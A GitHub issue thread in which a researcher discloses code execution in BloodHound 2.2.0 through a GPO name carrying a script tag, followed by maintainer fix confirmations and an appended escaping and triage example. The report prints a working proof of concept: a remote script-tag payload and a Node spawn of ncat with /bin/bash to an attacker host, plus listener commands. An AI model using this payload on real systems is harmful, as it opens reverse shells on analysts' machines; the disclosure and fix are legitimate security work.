Code execution in Bloodhound via malicious AD Object #267
Comments
Hi, I am sure to understand the purpose of the GPO during the entire process - could you clarify please? Sylvain |
A GPO can have all sorts of characters in its name. That's where the JavaScript payload is placed. The GPO has no other purpose than being read by SharpHound and "exporting" the payload to SharpHound's JSON output |
Thanks for the report, I'll work on fixing this ASAP! I've already identified the problem code
On Sun, Aug 25, 2019, 7:03 AM Fab wrote:
> Hi, I am sure to understand the purpose of the GPO during the entire process - could you clarify please? Sylvain
> A GPO can have all sorts of characters in its name. That's where the JavaScript payload is placed. The GPO has no other purpose than being read by SharpHound and "export" the payload to SharpHound's JSON output
|
I've pushed a potential fix for the issue in c48afcb. Going to test it a bit more as well. |
The fix properly renders the characters as text, not as HTML tags. I also deployed a fix to another potentially injectable portion of the UI at the same time. @6661620a tested my fix as well and confirmed it works. I'm going to close this issue and push a release out containing this fix. Thanks again @6661620a! |
Dear Bloodhound Team –
I identified a way to achieve code execution in BloodHound 2.2.0 by creating a GPO with a name containing JavaScript code that will trigger in BloodHound's search-autocomplete function. The injected JavaScript is not only a valid XSS but also allows the creation of a child process.
The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat:

1. Create a GPO with the following name:

   ```
   aaaaaa<SCRIPT SRC="http://<attacker host>:<some port>/poc.js">
   ```

2. Run SharpHound:

   ```powershell
   Invoke-BloodHound -Stealth
   ```

3. Import the collected data.

4. Host the following JS payload as POC.JS (all uppercase is important here since the SharpHound output JSON always has the value for the name field in upper case):

   ```javascript
   // Loaded by the injected <SCRIPT SRC=...> tag; runs in BloodHound's Electron renderer, where Node's child_process is available
   const { spawn } = require('child_process');
   spawn('ncat', ['-e', '/bin/bash', '<attacker host>', '<some port>']);
   ```

   e.g. with

   ```
   python -m SimpleHTTPServer <some port>
   ```

5. Start a listener:

   ```
   nc -v -l -p <some port>
   ```

6. Search for "aa" in BloodHound and catch the shell.
I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than "aaaaa", and I also would not consider JavaScript one of my strengths, but I hope I could prove my point here :)
I also made a video
![Vimeo Bloodhound PoC](https://camo.githubusercontent.com/b0874f292bf120001f667f56496ff55b7ec195ce3da4ab50792766ad31cc9a7f/68747470733a2f2f692e76696d656f63646e2e636f6d2f766964656f2f3335353737353131372e6a70673f6d773d31333030266d683d373133)
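The maintainer's fix comment above says the fix renders the characters as text rather than as HTML tags, and the report shows why that matters: SharpHound copies the GPO name verbatim into its JSON, so whatever the UI does with that string decides whether a tag inside it becomes live markup. The following is an added example, not BloodHound's or SharpHound's code, that shows the unsafe concatenation beside the escaped-text rendering and adds a small triage pass over collector output that flags object names containing tag delimiters. The record shape (`type`/`name` fields) and the sample names are constructed assumptions, not SharpHound's real schema.

```javascript
// Added example (not BloodHound's or SharpHound's code). Shows the difference
// between concatenating an untrusted AD object name into markup and rendering
// it as text, plus a triage pass over collector output. Record shape and
// sample names are constructed for this demo, not SharpHound's real schema.

// Escape the characters that let a string be parsed as HTML or attribute
// markup when concatenated into innerHTML. Rendering via textContent or a
// framework's default text binding gives the same protection without this helper.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Autocomplete entry built the vulnerable way: the name becomes live markup,
// so a <SCRIPT SRC=...> inside it is fetched and executed by the renderer.
function unsafeSuggestionMarkup(name) {
  return `<li>${name}</li>`;
}

// Same entry built the fixed way: the name is shown literally.
function safeSuggestionMarkup(name) {
  return `<li>${escapeHtml(name)}</li>`;
}

// Triage: flag object names that contain tag delimiters. Quotes are escaped
// for rendering above but not flagged here, since apostrophes are common in
// legitimate object names and only '<' / '>' can open a tag.
const TAG_DELIMITERS = /[<>]/;
function findSuspiciousNames(records) {
  return records
    .filter((r) => TAG_DELIMITERS.test(r.name))
    .map((r) => ({ type: r.type, name: r.name }));
}

// Constructed sample records (assumed {type, name} shape, names upper-cased as
// the report notes). The second mirrors the report's GPO name; host and port
// are placeholders.
const SAMPLE_RECORDS = [
  { type: 'GPO', name: 'DEFAULT DOMAIN POLICY' },
  { type: 'GPO', name: 'AAAAAA<SCRIPT SRC="HTTP://<ATTACKER HOST>:<SOME PORT>/POC.JS">' },
  { type: 'USER', name: "O'BRIEN" },
];

// Run the triage and show both renderings for each hit.
for (const hit of findSuspiciousNames(SAMPLE_RECORDS)) {
  console.log(`suspicious ${hit.type} name: ${hit.name}`);
  console.log(`  unsafe render: ${unsafeSuggestionMarkup(hit.name)}`);
  console.log(`  safe render:   ${safeSuggestionMarkup(hit.name)}`);
}
```

Running it with `node` prints the one flagged GPO record with both renderings; the escaped form shows the tag as literal text in the list item, which is the behaviour the fix commit describes. The triage pass is the cheap check a defender can run over any collector export before importing it, since an object name with `<` or `>` in it is rare enough in practice to be worth a look.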